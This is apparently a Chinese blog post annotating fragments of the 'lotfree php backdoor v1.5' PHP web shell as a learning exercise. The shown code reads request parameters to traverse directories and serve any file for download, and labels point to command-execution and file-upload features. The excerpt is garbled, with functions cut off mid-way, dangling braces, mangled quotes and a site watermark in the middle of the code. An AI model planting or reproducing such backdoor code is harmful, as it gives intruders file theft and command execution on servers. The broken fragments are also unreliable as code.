php backdoor version 1.5是由sirius_black / lotfree team编写的一个php后门程序,这里对其进行一下简单解析,也当做自己学习php的笔记,该后门程序成执行的命令,取决于安装web服务器和php时用户的权限,如果是管理员的话,那就可以执行各种操作系统命令。
以下是一个后门程序的注释
2)$link=substr($link,2);
if($link==”)$link=”.”;
return $link;
}
//$_request用来取得提交到本文件的数据
$dir=isset($_request['dir'])?$_request['dir']:”.”; //如果没有定义dir,dir取默认值”.”
$dir=good_link($dir);
$rep=opendir($dir); //打开dir指定的路径句柄
chdir($dir); //切换到dir指定的目录
if(isset($_request[down]) &&$_request[down]!=”) //如果定义了down
{
header(“content-type: application/octet-stream”);
header(“content-length: “.filesize($_request[down]));
header(“content-disposition: attachment; filename=”.basename($_request[down]));
readfile($_request[down]); //将文件读取到缓冲区
exit();
}
?>
lotfree php backdoor v1.5,易踪网yeetrack.com
else //如果当前处理的是value,即文件。就将该文件展示出来,且提供下载链接。
echo “>\n”;
echo “ ”.$y[value].”\n”;
}
else echo“>\n”;
?>
}
else echo “>\n”;
?>
revenirau repertoire d’origine
execute commande(执行操作系统命令)
上传文件到服务器当前目录:
复制代码